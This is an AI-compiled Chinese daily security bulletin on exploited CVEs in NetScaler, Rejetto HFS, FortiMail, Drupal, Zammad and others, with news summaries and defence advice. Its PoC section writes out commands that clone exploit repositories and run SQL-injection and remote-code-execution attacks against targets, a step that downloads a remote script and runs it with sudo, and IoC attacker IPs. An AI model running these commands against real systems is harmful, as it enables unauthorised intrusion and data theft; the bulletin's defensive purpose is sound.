每日安全情报报告 · 2026-10-05

每日安全情报报告 · 2026-10-05

由 AI 整理发布

本期聚焦 2026-10-03 至 2026-10-05 新增/升级的高危漏洞与在野利用活动。重点信号:Citrix NetScaler 再曝 SAML 内存溢出零日(CVE-2026-88779)已于 10-04 列入 CISA KEV,10-07 为联邦整改截止 ;Rejetto HFS 会话伪造漏洞(CVE-2026-61500,CVSS 9.3)遭中国背景组织针对性利用,VulnCheck 于 10-01 监测到针对美国真实主机的攻击尝试。此外,Zammad 双零日整改截止日即为今日(10-05),FortiMail 零日整改期(10-04)已过但仍活跃。消费级/开发者组件(Liquidjs RCE CVSS 10、Drupal SQLi→RCE 新 PoC、Ubuntu snapd、Notepad++)亦有多起公开利用。


一、最新高危漏洞(近 24--48 小时)

🔴 风险级别:紧急(在野利用 / KEV)

CVE 编号 漏洞类型 受影响组件 CVSS 状态 链接
CVE-2026-88779 内存缓冲区越界(CWE-119)→ SAML 认证守护进程拒绝服务 Citrix NetScaler ADC / Gateway(配置为 SAML SP 或 IdP 的客户自管设备) 8.7 (v4) 在野利用(KEV 10-04 加入,截止 10-07) NVD 详情 · The Hacker News · CISA KEV · Citrix CTX697174
CVE-2026-61500 弱 PRNG 会话伪造(CWE-338)→ 管理员会话伪造 + RCE Rejetto HTTP File Server (HFS) 3.0.0--3.2.0 9.3 (v4) / 9.8 (v3) 在野利用(VulnCheck 10-01 监测,中国背景组织 targeting 美国主机) NVD 详情 · VulnCheck 分析 (The Clarity) · CyberWorldOps
CVE-2026-104286 路径遍历 + NULL 字节(CWE-22 / CWE-158)→ 任意文件写 Fortinet FortiMail 8.0.0--8.0.1 / 7.6.0--7.6.6 / 7.4.0--7.4.8 / 7.2.0--7.2.9 9.8 在野利用(KEV,10-04 整改截止已过,仍活跃) NVD 详情 · Fortinet FG-IR-26-175 · The Hacker News
CVE-2026-88771 / CVE-2026-88772 输入验证不当 / DTLS 内存溢出 → 未认证 RCE Citrix NetScaler ADC / Gateway 14.1 / 13.1(默认配置) 9.8 / 8.1 (v3) 在野利用(KEV 9-27) NVD 详情 · Citrix CTX697096
CVE-2026-76504 URI 编码认证绕过(CWE-177) Cisco Catalyst SD-WAN Manager 9.8 在野利用(KEV) NVD 详情 · Rapid7 分析
CVE-2026-102489 / CVE-2026-102490 会话固定 → RCE / 本地提权(zammad→root) Zammad 6.3.0--6.5.4(链一)/ 全版本 9.4 / 9.8 在野利用(KEV 10-02 加入,10-05 整改截止) NVD 详情 · DIVD-2026-00015
CVE-2026-93616 目录遍历 + 文件上传 Check Point Quantum Security Management 9.8 在野利用(KEV) NVD 详情

🟠 风险级别:严重(高危 / 公开 PoC / 影响面广)

CVE 编号 漏洞类型 受影响组件 CVSS 状态 链接
CVE-2026-9082 PostgreSQL 实体查询 SQL 注入(CWE-89)→ RCE(session_preload_libraries) Drupal Core 8.9--11.3(仅 PostgreSQL 后端) 9.8 (v3) 公开 PoC(新 /user/login 向量,KEV 在野) NVD 详情 · Drupal SA-CORE-2026-004 · 11romain PoC
CVE-2026-45618 原型链污染 → RCE(valueOf 过滤器返回内部执行上下文) Liquidjs 模板引擎 ≤ 10.25.7 10.0 已修复 10.27.0,月下载量 730 万 NVD 详情 · FreeBuf 报道
CVE-2026-104610 Boa Web Server 栈溢出(CWE-121) Tenda HG7 / HG9 / HG10(固件 300001138_en_xpon) 10.0 公开 PoC 已发布,尚无官方补丁 NVD 详情 · VulDB-412917 · PoC Issue
CVE-2026-3888 snap-confine 竞态 + /tmp/.snap 重建 → 本地提权 Ubuntu snapd(24.04 / 25.10 / 26.04 开发版) 7.8 已修复(Qualys TRU 发现) NVD 详情 · FreeBuf 报道
CVE-2026-48778 / CVE-2026-48800 XML 处理缺陷 → 本地代码执行 Notepad++ ≤ v8.9.6 7.8 公开利用代码,已修复 v8.9.6.1 NVD 详情 · FreeBuf 报道

重点标注(在野利用 CVE) :CVE-2026-88779(Citrix NetScaler SAML 新零日,今日新增 KEV)、CVE-2026-61500(Rejetto HFS,VulnCheck 确认在野)、CVE-2026-104286(FortiMail)、CVE-2026-88771/CVE-2026-88772(Citrix NetScaler)、CVE-2026-76504(Cisco SD-WAN)、CVE-2026-102489/CVE-2026-102490(Zammad,今日整改截止)、CVE-2026-93616(Check Point)均已被 CISA KEV 或威胁情报机构确认"已在野利用",请优先处置。注意:9 月修复的 NetScaler 版本(14.1-73.37 / 13.1-64.23)并不能覆盖 CVE-2026-88779,需再次升级至 14.1-73.41 / 13.1-64.28。


二、最新漏洞 PoC / 利用验证(含使用步骤)

说明:以下条目分为"可复现 PoC"与"检测/核查脚本"两类,均标注实际使用方式。所有命令仅供授权环境下的安全验证与防御,请勿用于未授权目标。

1. Rejetto HFS 会话伪造 + RCE ------ CVE-2026-61500(在野利用)

  • 来源 :GitHub Security Advisory GHSA-xxrm-3f86-v97j · VulnCheck 分析 (The Clarity) · CyberWorldOps
  • 原理 :HFS 3.x 用非加密的 Math.random() 生成会话签名密钥,并在未认证 SRP 登录握手中向客户端泄露同 PRNG 的输出。攻击者收集少量登录响应即可重建 PRNG 状态、恢复密钥、伪造管理员会话,进而通过 server_code 配置执行服务端 JavaScript → 任意代码执行。Horizon3.ai 的 Zach Hanley 于 9-30 发布分析;研究者 aramosf(Alejandro Ramos)于 9 月底发布 Python PoC。
  • 使用步骤(版本核查 + 检测):
bash 复制代码
# 1. 确认 HFS 版本(Web 管理界面"关于",或响应头 Server: HFS x.x.x)
#    受影响区间:3.0.0 -- 3.2.0;安全版本:3.2.1+(补丁自 7 月已发布)

# 2. 获取公开 PoC(搜索 GitHub: CVE-2026-61500 / aramosf)
#    https://github.com/advisories/GHSA-xxrm-3f86-v97j
git clone https://github.com/<aramosf-PoC-repo>/CVE-2026-61500.git
cd CVE-2026-61500
pip install requests

# 3. 在授权靶机上验证会话伪造 / 管理员接管
python3 poc.py --target http://<TARGET>:PORT

# 4. 防御核查:检查 HFS 配置中异常 server_code 与异常管理员会话;
#    升级至 3.2.1+ 或临时下线公网暴露实例

⚠️ 该漏洞已有真实在野利用(中国背景组织针对美国主机,10-01 起),且修复已发布 3 个月,暴露实例应立即升级或下线。

2. Drupal Core PostgreSQL SQL 注入 → RCE ------ CVE-2026-9082(新 /user/login 向量 PoC)

  • 来源 :GitHub 11romain/CVE-2026-9082 · Drupal SA-CORE-2026-004 · Exploit-DB #52608
  • 原理 :PostgreSQL 实体查询条件类的 translateCondition() 用数组键构造 PDO 占位符名,攻击者通过 POST /user/login 的 name 字段传入含 ) 的数组键,使 PDO 在 ) 处截断占位符、剩余内容作为字面 SQL 注入。无需认证、无需启用 JSON:API。当数据库用户为 PG 超级用户时可经 session_preload_libraries 升级至 RCE。
  • 使用步骤:
bash 复制代码
# 1. 克隆 PoC 仓库
git clone https://github.com/11romain/CVE-2026-9082.git
cd CVE-2026-9082

# 2. 安装依赖
pip install -r requirements.txt

# 3. 验证是否存在 SQL 注入
python3 cve_2026_9082_check.py http://target:8081

# 4. 提取数据库信息
python3 cve_2026_9082_sqli.py http://target:8081 --dbs
python3 cve_2026_9082_sqli.py http://target:8081 -D drupal --tables

# 5. RCE(需数据库用户为 PostgreSQL 超级用户)
python3 cve_2026_9082_rce.py http://target:8081 "id"

✅ 修复版本:11.3.10 / 11.2.12 / 11.1.10 / 10.6.9 / 10.5.10 / 10.4.10。临时缓解:将数据库账号降权为非超级用户并监控异常 POST /user/login 含 JSON 对象的请求。

3. Citrix NetScaler SAML 内存溢出 ------ CVE-2026-88779(版本 + 前置条件核查)

  • 来源 :Citrix CTX697174 · The Hacker News · CISA KEV
  • 说明 :尚无公开利用代码;属检测/版本核查 类。仅当 NetScaler 配置为 SAML SP(add authentication samlAction)或 SAML IdP(add authentication samlIdPProfile)时前置条件成立,可致拒绝服务(非 RCE)。9 月修复版本不覆盖此 CVE。
  • 使用步骤:
bash 复制代码
# 1. 登录 NetScaler,确认构建版本须 >= 14.1-73.41 或 13.1-64.28
show version

# 2. 检查是否配置 SAML SP / IdP(前置条件)
show running-config | grep -E "authentication samlAction|authentication samlIdPProfile"
# 若输出为空 → 不满足前置条件;若有条目且版本低于上述 → 立即升级

# 3. 升级至修复版本:14.1-73.41+ / 13.1-64.28+(FIPS/NDcPP:14.1-73.41 FIPS / 13.1-37.282+)

⚠️ CISA KEV 整改截止 2026-10-07 。Citrix 观测到针对未修补设备的定向拒绝服务攻击 ;9 月已升级至 88771/88772 修复版的实例仍需再次升级。

4. Citrix NetScaler DTLS 内存溢出 ------ CVE-2026-88772(公开 PoC,仍在野)

  • 来源 :GitHub murrez/CVE-2026-88772 · watchTowr 分析
  • 原理:DTLS 握手分片重组后写入固定缓冲区缺少长度检查,未认证攻击者完成 DTLS cookie 交换即可触发溢出 → RCE / DoS。与 CVE-2026-88779 属不同公告/修复线。
  • 使用步骤:
bash 复制代码
git clone https://github.com/murrez/CVE-2026-88772.git
cd CVE-2026-88772
pip install -r requirements.txt
python3 poc.py --target <NSIP>

✅ 修复版本:14.1-73.37+ / 13.1-64.23+(FIPS 同对应版本)。务必先取证再打补丁(攻击者已部署 webshell)。

5. FortiMail 零日 ------ CVE-2026-104286(IoC 落地核查)

  • 来源 :Fortinet FG-IR-26-175 · The Hacker News
  • 说明 :暂无公开利用代码;依赖 Fortinet 公布的 IoC 文件/ IP 进行落地核查(非 PoC,属检测手段)。修复版 8.0.2 / 7.6.7 / 7.4.9 尚未发布,整改截止 10-04 已过但仍活跃。
  • 已知 IoC :攻击者 IP 79.141.169[.]187、45.129.0[.]192;新增/篡改文件 /data/lib/liblog.so、/data/bin/webconsole、/data/bin/mailservice、/data/etc/ld.so.preload、/bin/smit、/data/etc/httpd.conf、/data/migadmin.tar.gz。
  • 核查步骤:
bash 复制代码
ls -l /data/lib/liblog.so /data/bin/webconsole /data/bin/mailservice \
      /data/etc/ld.so.preload /bin/smit /data/etc/httpd.conf
grep -E "79\.141\.169\.187|45\.129\.0\.192" /var/log/fortimail/*.log

✅ 缓解:① 禁用 IBE:config system encryption ibe → set status disable → end;② 限制管理口仅可信私网访问。

6. Zammad 双零日 ------ CVE-2026-102489 / CVE-2026-102490(IoC 日志检测,今日整改截止)

  • 来源 :DIVD-2026-00015 · FreeBuf 报道
  • 说明 :尚无完整武器化 PoC 公开,DIVD 提供失陷指标(IoC)日志检查脚本 用于自查。整改截止日即为 2026-10-05。
  • 使用步骤:
bash 复制代码
# 1. 下载 DIVD 日志检查脚本(至公告页获取最新)
#    https://csirt.divd.nl/DIVD-2026-00015
curl -O https://csirt.divd.nl/DIVD-2026-00015/zammad_ioc_check.sh
chmod +x zammad_ioc_check.sh

# 2. 在 Zammad 主机上以审计身份运行
sudo ./zammad_ioc_check.sh /var/log/zammad /opt/zammad/log

# 3. 版本核查:6.3.0--6.5.4 为高危区间,立即升级至 7.2.0+

⚠️ 该漏洞链曾被 Agentic AI 自动化攻击用于攻陷荷兰漏洞披露机构 DIVD 自身,全程仅数秒。今日为 CISA KEV 整改截止日。


三、网络安全最新文章 / 研究报告

  1. New NetScaler Zero-Day Exploited in Targeted Attacks Can Knock SAML Deployments Offline --- The Hacker News (2026-10-05)

    摘要:Citrix 修复 NetScaler SAML 内存溢出零日 CVE-2026-88779(CVSS 8.7),已在定向攻击中被利用,CISA 于 10-04 列入 KEV,10-07 为整改截止;9 月修复版不覆盖此漏洞。

    阅读原文

  2. Attackers Target Rejetto HFS Flaw That Enables Admin Session Forgery and RCE --- The Hacker News / VulnCheck (2026-10-05)

    摘要:Rejetto HFS CVE-2026-61500(CVSS 9.3)遭中国背景组织针对美国真实主机利用,VulnCheck 于 10-01 监测到攻击尝试,公开 PoC 已发布。

    阅读原文

  3. China-Aligned TA419 Targets U.S. AI Policy Experts With Microsoft AitM Phishing --- The Hacker News / Proofpoint (2026-10-04)

    摘要:与中国相关的 TA419 针对美国智库、高校与法律界的 AI 政策专家发起凭证钓鱼,冒充经济学家与 Anthropic 员工,主题为"军事集成 Claude 的反馈请求"。

    阅读原文

  4. ShinyHunters Suspect "Rey" Reportedly Detained in Jordan, Helping FBI Identify Group Members --- The Hacker News (2026-10-04)

    摘要:疑似 ShinyHunters/Scattered LAPSUS$ Hunters 管理员 Rey(Saif al-Din Khader)于 9-29 在约旦被拘,正配合 FBI 指认成员。

    阅读原文

  5. MI5 Says China's MSS Funded Research Involving 100+ U.K.-Linked Academics --- The Hacker News (2026-10-03)

    摘要:MI5 警告,中国通用技术研究院(CGTRI,MSS 前线公司)资助涉及 100 余名英国关联学者的研究,涵盖 AI、网络安全与隐写术。

    阅读原文

  6. Warlock Exploits SharePoint Flaws to Disable Security Tools and Deploy Ransomware --- The Hacker News / Symantec (2026-10-03)

    摘要:疑似中国背景组织 Warlock(Gold Salem / Longlegs / Storm-2603)持续武器化 SharePoint 漏洞,在葡/西语国家针对关键基础设施、政府、教育行业部署勒索软件并禁用安全工具。

    阅读原文

  7. Liquidjs 模板引擎曝 CVSS 10 分高危漏洞,数百万项目面临 RCE 风险 --- FreeBuf (2026-10,近期)

    摘要:Liquidjs 远程代码执行漏洞 CVE-2026-45618(CVSS 满分 10.0),源于过滤器求值阶段原型链污染,月下载量 730 万,已修复至 10.27.0。

    阅读原文

  8. Ubuntu 桌面系统漏洞可使攻击者获取完整 root 权限 --- FreeBuf (2026-10,近期)

    摘要:Ubuntu snapd/snap-confine 本地提权漏洞 CVE-2026-3888(CVSS 7.8),经 /tmp/.snap 竞争重建实现 root 代码执行,Qualys 发现,已修复。

    阅读原文

  9. Notepad++ 漏洞利用代码及安全漏洞细节公开 --- FreeBuf (2026-10,近期)

    摘要:Notepad++ CVE-2026-48800 / CVE-2026-48778(CVSS 7.8)通过 XML 文件实现本地代码执行,利用代码已公开,已修复 v8.9.6.1。

    阅读原文

  10. Critical FortiMail Zero-Day Flaw Exploited in Attacks Allows Unauthenticated Arbitrary File Writes --- The Hacker News (2026-10-02,持续活跃)

    摘要:FortiMail 零日 CVE-2026-104286(CVSS 9.8)在野利用、KEV 收录,附完整 IoC(IP + 文件哈希),10-04 整改截止已过。

    阅读原文


四、防御建议(本期重点)

  1. NetScaler 专项(紧急) :CVE-2026-88779 为新零日 KEV ,仅 SAML SP/IdP 配置设备受影响,10-07 前升级至 14.1-73.41 / 13.1-64.28;9 月修复版不覆盖,需二次升级。CVE-2026-88771/88772 仍在野,先取证后补丁。
  2. Rejetto HFS 立即处置:CVE-2026-61500 已有真实在野利用,修复 3.2.1 早已发布,公网暴露实例立即升级或下线。
  3. 工单/协作系统:Zammad 双零日(CVE-2026-102489/102490)今日(10-05)为 CISA KEV 整改截止,6.3.0--6.5.4 紧急升级至 7.2.0+ 并跑 IoC 脚本自查。
  4. 邮件安全设备:FortiMail(CVE-2026-104286)整改期已过且仍活跃,执行禁用 IBE + 管理口限制 + IoC 核查。
  5. Web 应用/CMS :Drupal(CVE-2026-9082)PostgreSQL 后端实例用新 /user/login 向量可被未认证 RCE,立即升级并降权数据库账号;Liquidjs(CVE-2026-45618)升级至 10.27.0。
  6. 消费级/开发者组件:Tenda HG 系列(CVE-2026-104610,CVSS 10.0)有公开 PoC 且无补丁,关闭公网管理口;Ubuntu snapd、Notepad++ 按版本升级。

部分内容由 AI 辅助生成

相关推荐
sbjdhjd2 小时前
云安全 | Docker 容器逃逸复盘(一):从隔离边界到运行时链路,如何确认自己身处容器
网络安全·docker·云原生·容器·kubernetes·云计算·云安全
XLYcmy2 小时前
PDF 论文处理器 — 技术报告文档
数据库·python·网络安全·pdf·embedding·dify·rag
杭州领祺科技21 小时前
27 号令横向隔离落地清单:储能边缘计算网关 ≠ 电力专用网闸,算电协同中心安全分区/纵向加密/SPDnet 怎么配
人工智能·安全·网络安全·边缘计算·储能·电力·电力监控
菩提小狗1 天前
每日安全情报报告 · 2026-10-04
网络安全·漏洞·cve·安全情报·每日安全
迪康coolmu1 天前
屏幕水印与防拍照落地:从水印类型到泄密溯源的完整配置
运维·网络·安全·网络安全·数据安全
Seraphina361 天前
DVWA(SQL Injection-High,XSS Reflected-Medium,XSS Stored-Medium)
数据库·经验分享·sql·网络安全·xss
在猴站学算法2 天前
(SQL注入学习)无回显的报错注入(Error-Based)
学习·网络安全·sql注入·ctf竞赛
sogw-三叶草️2 天前
House of Orange
网络安全·pwn·堆·二进制安全
Seraphina362 天前
DVWA(SQL注入-low,medium,XSS反射-low)
前端·数据库·笔记·sql·网络安全·web·xss